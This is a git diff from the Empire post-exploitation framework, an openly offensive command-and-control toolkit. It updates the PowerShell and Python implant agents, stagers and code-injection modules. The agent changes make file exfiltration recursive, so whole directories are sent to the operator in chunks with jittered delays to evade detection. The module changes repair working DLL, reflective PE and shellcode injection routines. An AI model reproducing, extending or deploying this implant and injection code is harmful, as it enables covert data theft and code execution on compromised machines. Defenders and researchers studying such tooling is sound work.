EmpireProject · peyu123 · Oct 12, 2017 · Mar 10, 2018 · Mar 10, 2018 · Mar 12, 2018
diff --git a/.gitignore b/.gitignore
@@ -11,7 +11,7 @@ LastTask*
 data/obfuscated_module_source/*.ps1
 data/misc/ToObfuscate.ps1
 data/misc/Obfuscated.ps1
-setup/xar/
+setup/xar*/
 setup/bomutils/
 .venv
 .DS_Store
diff --git a/Dockerfile b/Dockerfile
@@ -1,5 +1,5 @@
 # NOTE: Only use this when you want to build image locally
-#       else use `docker pull empireproject\empire:{VERSION}`
+#       else use `docker pull empireproject/empire:{VERSION}`
 #       all image versions can be found at: https://hub.docker.com/r/empireproject/empire/
 
 # -----BUILD COMMANDS----
@@ -45,8 +45,8 @@ RUN apt-get update && apt-get install -qy \
     apt-utils \
     lsb-core \
     python2.7 \
-    python-dev \
-  && ln -sf /usr/bin/python2.7 /usr/bin/python \  
+    python-dev \ 
+  && ln -sf /usr/bin/python2.7 /usr/bin/python \
   && rm -rf /var/lib/apt/lists/*
 
 # build empire from source

diff --git a/README.md b/README.md
@@ -1,12 +1,12 @@
 # Empire
 
-Empire is a post-exploitation framework that includes a pure-PowerShell2.0 Windows agent, and a pure Python 2.6/2.7 Linux/OS X agent. It is the merge of the previous PowerShell Empire and Python EmPyre projects. The framework offers cryptologically-secure communications and a flexible architecture. On the PowerShell side, Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework. PowerShell Empire premiered at [BSidesLV in 2015](https://www.youtube.com/watch?v=Pq9t59w0mUI) and Python EmPyre premeiered at HackMiami 2016.
+Empire is a post-exploitation framework that includes a pure-PowerShell2.0 Windows agent, and a pure Python 2.6/2.7 Linux/OS X agent. It is the merge of the previous PowerShell Empire and Python EmPyre projects. The framework offers cryptologically-secure communications and a flexible architecture. On the PowerShell side, Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework. PowerShell Empire premiered at [BSidesLV in 2015](https://www.youtube.com/watch?v=Pq9t59w0mUI) and Python EmPyre premiered at HackMiami 2016.
 
 Empire relies heavily on the work from several other projects for its underlying functionality. We have tried to call out a few of those people we've interacted with [heavily here](http://www.powershellempire.com/?page_id=2) and have included author/reference link information in the source of each Empire module as appropriate. If we have failed to improperly cite existing or prior work, please let us know.
 
-Empire is developed by [@harmj0y](https://twitter.com/harmj0y), [@sixdub](https://twitter.com/sixdub), [@enigma0x3](https://twitter.com/enigma0x3), [rvrsh3ll](https://twitter.com/424f424f), [@killswitch_gui](https://twitter.com/killswitch_gui), and [@xorrior](https://twitter.com/xorrior).
+Empire is developed by [@harmj0y](https://twitter.com/harmj0y), [@sixdub](https://twitter.com/sixdub), [@enigma0x3](https://twitter.com/enigma0x3), [@rvrsh3ll](https://twitter.com/424f424f), [@killswitch_gui](https://twitter.com/killswitch_gui), and [@xorrior](https://twitter.com/xorrior).
 
-Feel free to join us on Slack! http://adaptiveempire.slack.com/
+Feel free to join us in the #psempire channel of the [BloodHound Slack](http://bloodhoundgang.herokuapp.com/)!
 
 ## Install
 
@@ -28,6 +28,6 @@ Contributions are more than welcome! The more people who contribute to the proje
 * Cite previous work in the **'Comments'** module section.
 * If your script.ps1 logic is large, may be reused by multiple modules, or is updated often, consider implementing the logic in the appropriate **data/module_source/*** directory and [pulling the script contents into the module on tasking](https://github.com/PowerShellEmpire/Empire/blob/0cbdb165a29e4a65ad8dddf03f6f0e36c33a7350/lib/modules/situational_awareness/network/powerview/get_user.py#L85-L95).
 * Use [approved PowerShell verbs](https://technet.microsoft.com/en-us/library/ms714428(v=vs.85).aspx) for any functions.
-* PowerShell Version 2 compatibility is **STRONGLY** preferred. 
+* PowerShell Version 2 compatibility is **STRONGLY** preferred.
 * TEST YOUR MODULE! Be sure to run it from an Empire agent before submitting a pull to ensure everything is working correctly.
 * For additional guidelines for your PowerShell code itself, check out the [PowerSploit style guide](https://github.com/PowerShellMafia/PowerSploit/blob/master/README.md).
diff --git a/data/agent/agent.ps1 b/data/agent/agent.ps1
@@ -279,20 +279,20 @@ function Invoke-Empire {
         }
         else {
             switch -regex ($cmd) {
-                '(ls|dir)' {
+                '(ls|^dir)' {
                     if ($cmdargs.length -eq "") {
-                        $output = Get-ChildItem -force | select mode,@{Name="Owner";Expression={ (Get-Acl $_.FullName).Owner }},lastwritetime,length,name
+                        $output = Get-ChildItem -force | select mode,@{Name="Owner";Expression={(Get-Acl $_.FullName).Owner }},lastwritetime,length,name
                     }
                     else {
                         try{
-                            $output = IEX "$cmd $cmdargs -Force -ErrorAction Stop | select mode,@{Name="Owner";Expression={ (Get-Acl $_.FullName).Owner }},lastwritetime,length,name"
+                            $output = IEX "$cmd $cmdargs -Force -ErrorAction Stop" | select mode,@{Name="Owner";Expression={ (Get-Acl $_.FullName).Owner }},lastwritetime,length,name
                         }
                         catch [System.Management.Automation.ActionPreferenceStopException] {
                             $output = "[!] Error: $_ (or cannot be accessed)."
                         }
                     }
                 }
-                '(mv|move|copy|cp|rm|del|rmdir)' {
+                '(mv|move|copy|cp|rm|del|rmdir|mkdir)' {
                     if ($cmdargs.length -ne "") {
                         try {
                             IEX "$cmd $cmdargs -Force -ErrorAction Stop"
@@ -441,6 +441,8 @@ function Invoke-Empire {
         param($JobName)
         if($Script:Jobs.ContainsKey($JobName)) {
             $Script:Jobs[$JobName]['Buffer'].ReadAll()
+            $Script:Jobs[$JobName]['PSHost'].Streams.Error
+            $Script:Jobs[$JobName]['PSHost'].Streams.Error.Clear()
         }
     }
 
@@ -453,6 +455,8 @@ function Invoke-Empire {
             $Null = $Script:Jobs[$JobName]['PSHost'].Stop()
             # get results
             $Script:Jobs[$JobName]['Buffer'].ReadAll()
+            $Script:Jobs[$JobName]['PSHost'].Streams.Error
+            $Script:Jobs[$JobName]['PSHost'].Streams.Error.Clear()
             # unload the app domain runner
             $Null = [AppDomain]::Unload($Script:Jobs[$JobName]['AppDomain'])
             $Script:Jobs.Remove($JobName)
@@ -840,37 +844,39 @@ function Invoke-Empire {
                         $ChunkSize = 1024KB
                     }
 
-                    # resolve the complete path
-                    $Path = Get-Childitem $Path | ForEach-Object {$_.FullName}
-
-                    # read in and send the specified chunk size back for as long as the file has more parts
-                    $Index = 0
-                    do{
-                        $EncodedPart = Get-FilePart -File "$path" -Index $Index -ChunkSize $ChunkSize
-
-                        if($EncodedPart) {
-                            $data = "{0}|{1}|{2}" -f $Index, $path, $EncodedPart
-                            (& $SendMessage -Packets $(Encode-Packet -type $type -data $($data) -ResultID $ResultID))
-                            $Index += 1
-
-                            # if there are more parts of the file, sleep for the specified interval
-                            if ($script:AgentDelay -ne 0) {
-                                $min = [int]((1-$script:AgentJitter)*$script:AgentDelay)
-                                $max = [int]((1+$script:AgentJitter)*$script:AgentDelay)
-
-                                if ($min -eq $max) {
-                                    $sleepTime = $min
+                    # resolve the complete paths
+                    $Path = Get-Childitem -Recurse $Path -File  | ForEach-Object {$_.FullName}
+
+                    foreach ( $File in $Path) {
+                        # read in and send the specified chunk size back for as long as the file has more parts
+                        $Index = 0
+                        do{
+                            $EncodedPart = Get-FilePart -File "$file" -Index $Index -ChunkSize $ChunkSize
+
+                            if($EncodedPart) {
+                                $data = "{0}|{1}|{2}" -f $Index, $file, $EncodedPart
+                                (& $SendMessage -Packets $(Encode-Packet -type $type -data $($data) -ResultID $ResultID))
+                                $Index += 1
+
+                                # if there are more parts of the file, sleep for the specified interval
+                                if ($script:AgentDelay -ne 0) {
+                                    $min = [int]((1-$script:AgentJitter)*$script:AgentDelay)
+                                    $max = [int]((1+$script:AgentJitter)*$script:AgentDelay)
+
+                                    if ($min -eq $max) {
+                                        $sleepTime = $min
+                                    }
+                                    else{
+                                        $sleepTime = Get-Random -minimum $min -maximum $max;
+                                    }
+                                    Start-Sleep -s $sleepTime;
                                 }
-                                else{
-                                    $sleepTime = Get-Random -minimum $min -maximum $max;
-                                }
-                                Start-Sleep -s $sleepTime;
                             }
-                        }
-                        [GC]::Collect()
-                    } while($EncodedPart)
+                            [GC]::Collect()
+                        } while($EncodedPart)
 
-                    Encode-Packet -type 40 -data "[*] File download of $path completed" -ResultID $ResultID
+                        Encode-Packet -type 40 -data "[*] File download of $file completed" -ResultID $ResultID
+                    }
                 }
                 catch {
                     Encode-Packet -type 0 -data '[!] File does not exist or cannot be accessed' -ResultID $ResultID

diff --git a/data/agent/agent.py b/data/agent/agent.py
@@ -280,41 +280,53 @@ def process_packet(packetType, data, resultID):
 
     elif packetType == 41:
         # file download
-        filePath = os.path.abspath(data)
-        if not os.path.exists(filePath):
+        objPath = os.path.abspath(data)
+        fileList = []
+        if not os.path.exists(objPath):
             return build_response_packet(40, "file does not exist or cannot be accessed", resultID)
 
-        offset = 0
-        size = os.path.getsize(filePath)
-        partIndex = 0
-
-        while True:
-
-            # get 512kb of the given file starting at the specified offset
-            encodedPart = get_file_part(filePath, offset=offset, base64=False)
-            c = compress()
-            start_crc32 = c.crc32_data(encodedPart)
-            comp_data = c.comp_data(encodedPart)
-            encodedPart = c.build_header(comp_data, start_crc32)
-            encodedPart = base64.b64encode(encodedPart)
-
-            partData = "%s|%s|%s" %(partIndex, filePath, encodedPart)
-            if not encodedPart or encodedPart == '' or len(encodedPart) == 16:
-                break
-
-            send_message(build_response_packet(41, partData, resultID))
-
-            global delay
-            global jitter
-            if jitter < 0: jitter = -jitter
-            if jitter > 1: jitter = 1/jitter
-
-            minSleep = int((1.0-jitter)*delay)
-            maxSleep = int((1.0+jitter)*delay)
-            sleepTime = random.randint(minSleep, maxSleep)
-            time.sleep(sleepTime)
-            partIndex += 1
-            offset += 512000
+        if not os.path.isdir(objPath):
+            fileList.append(objPath)
+        else:
+            # recursive dir listing
+            for folder, subs, files in os.walk(objPath):
+                for filename in files:
+                    #dont care about symlinks
+                    if os.path.exists(objPath):
+                        fileList.append(objPath + "/" + filename)
+
+        for filePath in fileList:
+            offset = 0
+            size = os.path.getsize(filePath)
+            partIndex = 0
+
+            while True:
+
+                 # get 512kb of the given file starting at the specified offset
+                 encodedPart = get_file_part(filePath, offset=offset, base64=False)
+                 c = compress()
+                 start_crc32 = c.crc32_data(encodedPart)
+                 comp_data = c.comp_data(encodedPart)
+                 encodedPart = c.build_header(comp_data, start_crc32)
+                 encodedPart = base64.b64encode(encodedPart)
+
+                 partData = "%s|%s|%s" %(partIndex, filePath, encodedPart)
+                 if not encodedPart or encodedPart == '' or len(encodedPart) == 16:
+                     break
+
+                 send_message(build_response_packet(41, partData, resultID))
+
+                 global delay
+                 global jitter
+                 if jitter < 0: jitter = -jitter
+                 if jitter > 1: jitter = 1/jitter
+
+                 minSleep = int((1.0-jitter)*delay)
+                 maxSleep = int((1.0+jitter)*delay)
+                 sleepTime = random.randint(minSleep, maxSleep)
+                 time.sleep(sleepTime)
+                 partIndex += 1
+                 offset += 512000
 
     elif packetType == 42:
         # file upload

diff --git a/data/agent/stagers/common/get_sysinfo.py b/data/agent/stagers/common/get_sysinfo.py
@@ -53,10 +53,9 @@ def get_sysinfo(nonce='00000000'):
 
     language = 'python'
     cmd = 'ps %s' % (os.getpid())
-    ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
-    out = ps.stdout.read()
+    ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
+    out, err = ps.communicate()
     parts = out.split("\n")
-    ps.stdout.close()
     if len(parts) > 2:
         processName = " ".join(parts[1].split()[4:])
     else:

diff --git a/data/agent/stagers/dropbox.ps1 b/data/agent/stagers/dropbox.ps1
@@ -52,7 +52,7 @@ function Start-Negotiate {
 
     # try to ignore all errors
     $ErrorActionPreference = "SilentlyContinue";
-    $e=[System.Text.Encoding]::ASCII;
+    $e=[System.Text.Encoding]::UTF8;
 
     $SKB=$e.GetBytes($SK);
     # set up the AES/HMAC crypto

diff --git a/data/agent/stagers/http.ps1 b/data/agent/stagers/http.ps1
@@ -1,5 +1,5 @@
 function Start-Negotiate {
-    param($s,$SK,$UA='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko')
+    param($s,$SK,$UA="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko")
 
     function ConvertTo-RC4ByteStream {
         Param ($RCK, $In)
@@ -57,7 +57,7 @@ function Start-Negotiate {
 
     # try to ignore all errors
     $ErrorActionPreference = "SilentlyContinue";
-    $e=[System.Text.Encoding]::ASCII;
+    $e=[System.Text.Encoding]::UTF8;
     $customHeaders = "";
     $SKB=$e.GetBytes($SK);
     # set up the AES/HMAC crypto

diff --git a/data/agent/stagers/http_com.ps1 b/data/agent/stagers/http_com.ps1
@@ -57,7 +57,7 @@ function Start-Negotiate {
 
     # try to ignore all errors
     $ErrorActionPreference = "SilentlyContinue";
-    $e=[System.Text.Encoding]::ASCII;
+    $e=[System.Text.Encoding]::UTF8;
     $customHeaders = "";
     $SKB=$e.GetBytes($SK);
     # set up the AES/HMAC crypto

diff --git a/data/agent/stagers/http_mapi.ps1 b/data/agent/stagers/http_mapi.ps1
diff --git a/data/agent/stagers/onedrive.ps1 b/data/agent/stagers/onedrive.ps1
@@ -52,7 +52,7 @@ function Start-Negotiate {
 
     # try to ignore all errors
     $ErrorActionPreference = "SilentlyContinue";
-    $e=[System.Text.Encoding]::ASCII;
+    $e=[System.Text.Encoding]::UTF8;
 
     $SKB=$e.GetBytes($SK);
     # set up the AES/HMAC crypto

diff --git a/data/misc/cSharpTemplateResources/cmd/cmd/Program.cs b/data/misc/cSharpTemplateResources/cmd/cmd/Program.cs
@@ -27,8 +27,8 @@ public static void Main(string[] args)
 
             pipeline.Commands.AddScript(decodedScript);
 
-            pipeline.Commands.Add("Out-String");
+            pipeline.Commands.Add("Out-Default");
             pipeline.Invoke();
         }
 	}
-}
+}
diff --git a/data/misc/xar-1.6.1.tar.gz b/data/misc/xar-1.6.1.tar.gz
diff --git a/data/module_source/code_execution/Invoke-DllInjection.ps1 b/data/module_source/code_execution/Invoke-DllInjection.ps1
@@ -123,7 +123,7 @@ http://www.exploit-monday.com
         $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')
         # Get a reference to the GetModuleHandle and GetProcAddress methods
         $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')
-        $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')
+        $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String]))
         # Get a handle to the module specified
         $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
         $tmpPtr = New-Object IntPtr

diff --git a/data/module_source/code_execution/Invoke-ReflectivePEInjection.ps1 b/data/module_source/code_execution/Invoke-ReflectivePEInjection.ps1
@@ -1038,7 +1038,7 @@ $RemoteScriptBlock = {
         $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')
         # Get a reference to the GetModuleHandle and GetProcAddress methods
         $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')
-        $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')
+        $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String]))
         # Get a handle to the module specified
         $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
         $tmpPtr = New-Object IntPtr

diff --git a/data/module_source/code_execution/Invoke-Shellcode.ps1 b/data/module_source/code_execution/Invoke-Shellcode.ps1
@@ -275,7 +275,7 @@ http://www.exploit-monday.com
         $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')
         # Get a reference to the GetModuleHandle and GetProcAddress methods
         $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')
-        $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')
+        $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String]))
         # Get a handle to the module specified
         $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
         $tmpPtr = New-Object IntPtr